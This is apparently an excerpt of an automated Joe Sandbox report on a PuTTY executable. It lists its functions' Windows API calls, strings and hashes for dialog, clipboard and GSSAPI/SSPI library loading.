SetWindowTextA.USER32 ref: 00007FF6BB2A4A48
GetWindowLongPtrA.USER32 ref: 00007FF6BB2A4A5F
GetDlgItem.USER32 ref: 00007FF6BB2A4A8A

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Window$ItemLongText
String ID:
API String ID: 1037592912-0
Opcode ID: 55112ea9cfedc3bdb9907fa3427b84b628306595d99782860c20d661740bd241
Instruction ID: 00a14b68528af32b02706c6004666799d5d4454952f1cc8ce05ffc06f972127e
Opcode Fuzzy Hash: 55112ea9cfedc3bdb9907fa3427b84b628306595d99782860c20d661740bd241
Instruction Fuzzy Hash: 04F06251B19A5182FE19575AE9512BD2295FF4DFE0F249130CF1D8A3F5DE3CA8838B04

Function 00007FF6BB2A29F0 Relevance: 4.5, APIs: 3, Instructions: 18COMMON

Download Yara Rule

APIs

CreateDialogParamA.USER32 ref: 00007FF6BB2A2A14
ShowWindow.USER32 ref: 00007FF6BB2A2A22
SetActiveWindow.USER32 ref: 00007FF6BB2A2A2B

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Window$ActiveCreateDialogParamShow
String ID:
API String ID: 4156068129-0
Opcode ID: 594769b5ef74b6407d61c6ea7239f5212f48eb2a6803754689cca1e48bf82949
Instruction ID: 915b31337cf1cf23d1257780d775dcded5592b823878ca68b5566fa2921cb317
Opcode Fuzzy Hash: 594769b5ef74b6407d61c6ea7239f5212f48eb2a6803754689cca1e48bf82949
Instruction Fuzzy Hash: BFE01A29F29A2182FB049B29E81437D7321BB8CB60F514430CE4E82B70DE3CA1468F00

Function 00007FF6BB2AA880 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32 ref: 00007FF6BB2AA923

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: ab75f45ac4fac0c8a668b60e69d1b0306371ce7d995b58c6b8948f5e8a25c6cd
Instruction ID: cddee98d712abc1d39b5861a1f05c98e7a0e476d31274126dd1dabc490742e9c
Opcode Fuzzy Hash: ab75f45ac4fac0c8a668b60e69d1b0306371ce7d995b58c6b8948f5e8a25c6cd
Instruction Fuzzy Hash: 25119466F0A70645FF658A1EE28067A92A0BF8DB94F184835CF4D477A0DD3CE882C740

Function 00007FF6BB2D4D90 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 00007FF6BB2D4DCD

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: e97cadac6e52da1d43d57e83d769fa2f00492fef06e9a45af8a1d9a733207641
Instruction ID: ed1c3ad8d8cbfc64c738abded5740b8a922ecee988d392e8c276771b12fce55c
Opcode Fuzzy Hash: e97cadac6e52da1d43d57e83d769fa2f00492fef06e9a45af8a1d9a733207641
Instruction Fuzzy Hash: F8F08226710B9492EA01CB5BED40679A7A1F7ADFE1F248431DE4C93B64DE38D4978700

Function 00007FF6BB2AA20C Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32 ref: 00007FF6BB2AA1F1

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: b85605ddeebc4c515b878ddd3bba1f08587fade2082e769378aa296b3e607999
Instruction ID: c4618bc32c963fae7736e0cf86db9f563f483f0cb45f42f51e149ab60ecb584d
Opcode Fuzzy Hash: b85605ddeebc4c515b878ddd3bba1f08587fade2082e769378aa296b3e607999
Instruction Fuzzy Hash: F7E0E523B0914649E947DA0AB4455B82B80BB887F0F818831CF0943290EF38D9C7CB00

Function 00007FF6BB2AA1D2 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32 ref: 00007FF6BB2AA1F1

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: c70fe196b795f3c47ddd80d426c3a8baf32a1ec1110fd013186a2216e6d28506
Instruction ID: c3a8cf2f11c487efda39732addfa115812d4bd6739d8590377760e62a3daefad
Opcode Fuzzy Hash: c70fe196b795f3c47ddd80d426c3a8baf32a1ec1110fd013186a2216e6d28506
Instruction Fuzzy Hash: 0BE0DF17B0A10249E447DA0AB9404B81B40BB8DBF07854871CF0C57390FE39A9C3DB00

Function 00007FF6BB2C62C0 Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2FA930: GetSystemDirectoryA.KERNEL32(?,?,?,?,00000000,shell32.dll,00007FF6BB2C62CE), ref: 00007FF6BB2FA948
Part of subcall function 00007FF6BB2FA930: GetSystemDirectoryA.KERNEL32 ref: 00007FF6BB2FA9A3

LoadLibraryA.KERNELBASE ref: 00007FF6BB2C62E9

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: DirectorySystem$LibraryLoad
String ID:
API String ID: 2489551175-0
Opcode ID: 27c62e6d549d8a15bceb22169e8481e9014216941cf5d71124ba8faee8632f71
Instruction ID: cc6979ebd427af8714bd7e0b1cfde86abd4bb1a7096f6b98cbf0547df2e22647
Opcode Fuzzy Hash: 27c62e6d549d8a15bceb22169e8481e9014216941cf5d71124ba8faee8632f71
Instruction Fuzzy Hash: 6FE08C00F0A2AA41FC44632F7E455B802506F8EFE0B444830CE0D87B66EC2CA5828300

Function 00007FF6BB355070 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6BB353F1F), ref: 00007FF6BB3550AE

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 68853461a1403baadffb08df0f75db0ede80dfcaad64afb894515b0aba0f6205
Instruction ID: 921fe28b4039e26e7465b6b46aee9fc92edcde23de474dac466d5c61eb7e8c8a
Opcode Fuzzy Hash: 68853461a1403baadffb08df0f75db0ede80dfcaad64afb894515b0aba0f6205
Instruction Fuzzy Hash: 52F08210B0A20346FE5426AA988177D22807F4D7B0F0A4334DF2EC73E1DE3CB48187A8

Non-executed Functions

Function 00007FF6BB2DE7D0 Relevance: 121.1, APIs: 39, Strings: 30, Instructions: 375libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6BB2DE838
RegOpenKeyA.ADVAPI32 ref: 00007FF6BB2DE875
RegQueryValueExA.ADVAPI32 ref: 00007FF6BB2DE8AA
RegQueryValueExA.ADVAPI32 ref: 00007FF6BB2DE8FA
LoadLibraryExA.KERNEL32 ref: 00007FF6BB2DE981
FreeLibrary.KERNEL32 ref: 00007FF6BB2DE9BF
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEA50
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEA62
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEA74
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEA86
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEA9B
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEAB0
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEAC5
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEADA
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEAEF
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEB04
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEB19
RegCloseKey.ADVAPI32 ref: 00007FF6BB2DEB33
RegCloseKey.ADVAPI32 ref: 00007FF6BB2DE9FC

Part of subcall function 00007FF6BB2C62C0: LoadLibraryA.KERNELBASE ref: 00007FF6BB2C62E9

GetProcAddress.KERNEL32 ref: 00007FF6BB2DEB92
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEBA6
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEBBA
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEBCE
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEBE2
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEBF6
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEC0A
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEC1E
LoadLibraryExA.KERNEL32 ref: 00007FF6BB2DED4A
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEDA9
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEDBA
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEDCB
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEDDC
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEDF0
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEE04
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEE18
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEE2C
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEE40
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEE54
GetProcAddress.KERNEL32 ref: 00007FF6BB2DEE68

Strings

AddDllDirectory, xrefs: 00007FF6BB2DE831
QueryContextAttributesA, xrefs: 00007FF6BB2DEBEC
gss_release_cred, xrefs: 00007FF6BB2DEAD0, 00007FF6BB2DEE22
kernel32.dll, xrefs: 00007FF6BB2DE812
secur32.dll, xrefs: 00007FF6BB2DEB39
gss_display_status, xrefs: 00007FF6BB2DEA58, 00007FF6BB2DEDB0
\gssapi6, xrefs: 00007FF6BB2DE959
AcquireCredentialsHandleA, xrefs: 00007FF6BB2DEB81
InitializeSecurityContextA, xrefs: 00007FF6BB2DEB9C
Using SSPI from SECUR32.DLL, xrefs: 00007FF6BB2DEB6D
DeleteSecurityContext, xrefs: 00007FF6BB2DEBD8
FreeCredentialsHandle, xrefs: 00007FF6BB2DEBC4
InstallDir, xrefs: 00007FF6BB2DE89B, 00007FF6BB2DE8EB
i64.dll, xrefs: 00007FF6BB2DE967
gss_get_mic, xrefs: 00007FF6BB2DEA6A, 00007FF6BB2DEDC1
FreeContextBuffer, xrefs: 00007FF6BB2DEBB0
%.*s, xrefs: 00007FF6BB2DED05
Using GSSAPI from GSSAPI64.DLL, xrefs: 00007FF6BB2DEA2B
VerifySignature, xrefs: 00007FF6BB2DEC14
gss_release_buffer, xrefs: 00007FF6BB2DEABB, 00007FF6BB2DEE0E
MakeSignature, xrefs: 00007FF6BB2DEC00
gss_verify_mic, xrefs: 00007FF6BB2DEA7C, 00007FF6BB2DEDD2
gss_release_name, xrefs: 00007FF6BB2DEAE5, 00007FF6BB2DEE36
gss_acquire_cred, xrefs: 00007FF6BB2DEAFA, 00007FF6BB2DEE4A
gss_import_name, xrefs: 00007FF6BB2DEA91, 00007FF6BB2DEDE6
Using GSSAPI from user-specified library '%s', xrefs: 00007FF6BB2DED7C
gss_delete_sec_context, xrefs: 00007FF6BB2DEA3F, 00007FF6BB2DED98
gss_init_sec_context, xrefs: 00007FF6BB2DEAA6, 00007FF6BB2DEDFA
SOFTWARE\MIT\Kerberos, xrefs: 00007FF6BB2DE862
gss_inquire_cred_by_mech, xrefs: 00007FF6BB2DEB0F, 00007FF6BB2DEE5E

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AddressProc$Library$Load$CloseQueryValue$FreeOpen
String ID: %.*s$AcquireCredentialsHandleA$AddDllDirectory$DeleteSecurityContext$FreeContextBuffer$FreeCredentialsHandle$InitializeSecurityContextA$InstallDir$MakeSignature$QueryContextAttributesA$SOFTWARE\MIT\Kerberos$Using GSSAPI from GSSAPI64.DLL$Using GSSAPI from user-specified library '%s'$Using SSPI from SECUR32.DLL$VerifySignature$\gssapi6$gss_acquire_cred$gss_delete_sec_context$gss_display_status$gss_get_mic$gss_import_name$gss_init_sec_context$gss_inquire_cred_by_mech$gss_release_buffer$gss_release_cred$gss_release_name$gss_verify_mic$i64.dll$kernel32.dll$secur32.dll
API String ID: 1387001575-208331058
Opcode ID: e1663668d4c15dd3ff402da25674cb35373b035891558bf3f57085a75f3d3f43
Instruction ID: d4b79358845119299bb17b31e6600485a844b7794bff8fb94b27160d00db62e2
Opcode Fuzzy Hash: e1663668d4c15dd3ff402da25674cb35373b035891558bf3f57085a75f3d3f43
Instruction Fuzzy Hash: 49023721A09B4291EA149B19FA502BA73A5FF89784F94423ADF8E87774EF3CE405C740

Function 00007FF6BB2A3C20 Relevance: 80.9, APIs: 43, Strings: 3, Instructions: 351windowCOMMON

Download Yara Rule

APIs

SetDlgItemTextA.USER32 ref: 00007FF6BB2A3CAA
GetWindowLongPtrA.USER32 ref: 00007FF6BB2A3CDD
SetBkMode.GDI32 ref: 00007FF6BB2A3CFF
GetStockObject.GDI32 ref: 00007FF6BB2A3D0A
SelectObject.GDI32 ref: 00007FF6BB2A3D16
GetObjectA.GDI32 ref: 00007FF6BB2A3D29
CreateFontIndirectA.GDI32 ref: 00007FF6BB2A3D54
SelectObject.GDI32 ref: 00007FF6BB2A3D65
GetSysColorBrush.USER32 ref: 00007FF6BB2A3D70
SetDlgItemTextA.USER32 ref: 00007FF6BB2A3E21
SetWindowTextA.USER32 ref: 00007FF6BB2A3E42
GetDlgItem.USER32 ref: 00007FF6BB2A3E56
DestroyWindow.USER32 ref: 00007FF6BB2A3E64
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A3E84
MapDialogRect.USER32 ref: 00007FF6BB2A3ECD
GetDlgItem.USER32 ref: 00007FF6BB2A3EF3
SetWindowPos.USER32 ref: 00007FF6BB2A3F12
GetDlgItem.USER32 ref: 00007FF6BB2A3F27
MapDialogRect.USER32 ref: 00007FF6BB2A3F57
SetWindowPos.USER32 ref: 00007FF6BB2A3F87
GetDlgItem.USER32 ref: 00007FF6BB2A3F92
MapDialogRect.USER32 ref: 00007FF6BB2A3FB3
SetWindowPos.USER32 ref: 00007FF6BB2A3FDC
GetDlgItem.USER32 ref: 00007FF6BB2A3FE7
MapDialogRect.USER32 ref: 00007FF6BB2A4008
SetWindowPos.USER32 ref: 00007FF6BB2A4031
GetDlgItem.USER32 ref: 00007FF6BB2A403C
MapDialogRect.USER32 ref: 00007FF6BB2A405D
SetWindowPos.USER32 ref: 00007FF6BB2A4086
GetDlgItem.USER32 ref: 00007FF6BB2A4091
MapDialogRect.USER32 ref: 00007FF6BB2A40B2
SetWindowPos.USER32 ref: 00007FF6BB2A40DB
MapDialogRect.USER32 ref: 00007FF6BB2A40FC
MapDialogRect.USER32 ref: 00007FF6BB2A4127
GetWindowRect.USER32 ref: 00007FF6BB2A4133
SetWindowPos.USER32 ref: 00007FF6BB2A4166
GetSystemMetrics.USER32 ref: 00007FF6BB2A4175
GetSystemMetrics.USER32 ref: 00007FF6BB2A417E
LoadImageA.USER32 ref: 00007FF6BB2A419C
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A41BC
GetDlgItem.USER32 ref: 00007FF6BB2A41D3
DestroyWindow.USER32 ref: 00007FF6BB2A41E1
ShowWindow.USER32 ref: 00007FF6BB2A41EF

Strings

(, xrefs: 00007FF6BB2A3EA2
<, xrefs: 00007FF6BB2A4042
PuTTYHostKeyMoreInfo, xrefs: 00007FF6BB2A3DC6

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Window$Item$Rect$Dialog$Object$Text$DestroyMessageMetricsSelectSendSystem$BrushColorCreateFontImageIndirectLoadLongModeShowStock
String ID: ($<$PuTTYHostKeyMoreInfo
API String ID: 3575920825-529978484
Opcode ID: 87304790d9a7df1b41a5b258c2f4c7d3acbdfd61a6c373cccda2ba85315bab3c
Instruction ID: 5ff487af6185be2c9abf37c3f9944a95a85a040083ed62d5d5bf68031cbfe90d
Opcode Fuzzy Hash: 87304790d9a7df1b41a5b258c2f4c7d3acbdfd61a6c373cccda2ba85315bab3c
Instruction Fuzzy Hash: FAE17F3560864186FB149B5AF95436EB7A1FB88BD4F144139EF4947BA8CFBCE4498F00

Function 00007FF6BB2885D0 Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 786clipboardmemorywindowCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF6BB28864B
GlobalAlloc.KERNEL32 ref: 00007FF6BB288669
GlobalAlloc.KERNEL32 ref: 00007FF6BB288676
GlobalLock.KERNEL32 ref: 00007FF6BB288690
GlobalLock.KERNEL32 ref: 00007FF6BB2886AC
WideCharToMultiByte.KERNEL32 ref: 00007FF6BB2886EC
GlobalFree.KERNEL32 ref: 00007FF6BB2887DD
GlobalUnlock.KERNEL32 ref: 00007FF6BB2888B5
GlobalFree.KERNEL32 ref: 00007FF6BB2888C5
GlobalUnlock.KERNEL32 ref: 00007FF6BB289239
GlobalUnlock.KERNEL32 ref: 00007FF6BB28923E
SendMessageA.USER32 ref: 00007FF6BB28925A
OpenClipboard.USER32 ref: 00007FF6BB289267
EmptyClipboard.USER32 ref: 00007FF6BB289275
SetClipboardData.USER32 ref: 00007FF6BB28928A
SetClipboardData.USER32 ref: 00007FF6BB289294
RegisterClipboardFormatA.USER32 ref: 00007FF6BB2892A2
SetClipboardData.USER32 ref: 00007FF6BB2892AD
CloseClipboard.USER32 ref: 00007FF6BB2892B3
SendMessageA.USER32 ref: 00007FF6BB2892D0
GlobalFree.KERNEL32 ref: 00007FF6BB28930C
GlobalFree.KERNEL32 ref: 00007FF6BB289311

Strings

\ulnone , xrefs: 00007FF6BB288F1F
\red%d\green%d\blue%d;, xrefs: 00007FF6BB288AB4, 00007FF6BB288B19
tindex + multilen <= len2, xrefs: 00007FF6BB289042
{\rtf1\ansi\deff0{\fonttbl\f0\fmodern %s;}\f0\fs%d, xrefs: 00007FF6BB28876E
\b , xrefs: 00007FF6BB288EBC
\par, xrefs: 00007FF6BB289090
{\colortbl ;, xrefs: 00007FF6BB288A87
\cf%d , xrefs: 00007FF6BB288DE7, 00007FF6BB288E12
Rich Text Format, xrefs: 00007FF6BB28929B
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00007FF6BB289049
\b0 , xrefs: 00007FF6BB288EC3
\'%02x, xrefs: 00007FF6BB289118
\highlight%d , xrefs: 00007FF6BB288E68, 00007FF6BB288E90
\ul , xrefs: 00007FF6BB288F18
{\uc%d\u%d, xrefs: 00007FF6BB28900E
}, xrefs: 00007FF6BB289020

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Global$Clipboard$Free$DataUnlock$AllocByteCharLockMessageMultiSendWide$CloseEmptyFormatOpenRegister
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$Rich Text Format$\'%02x$\b $\b0 $\cf%d $\highlight%d $\par$\red%d\green%d\blue%d;$\ul $\ulnone $tindex + multilen <= len2${\colortbl ;${\rtf1\ansi\deff0{\fonttbl\f0\fmodern %s;}\f0\fs%d${\uc%d\u%d$}
API String ID: 2045886889-120354098
Opcode ID: f2284d1eeddde13471561ac0a65f397146a9f94abeebdf4090213b859dd3ac92
Instruction ID: 6d19f200e35cd3330789c3dd459abb9f9fccfc89b3eb18783d98f3e37a53dac1
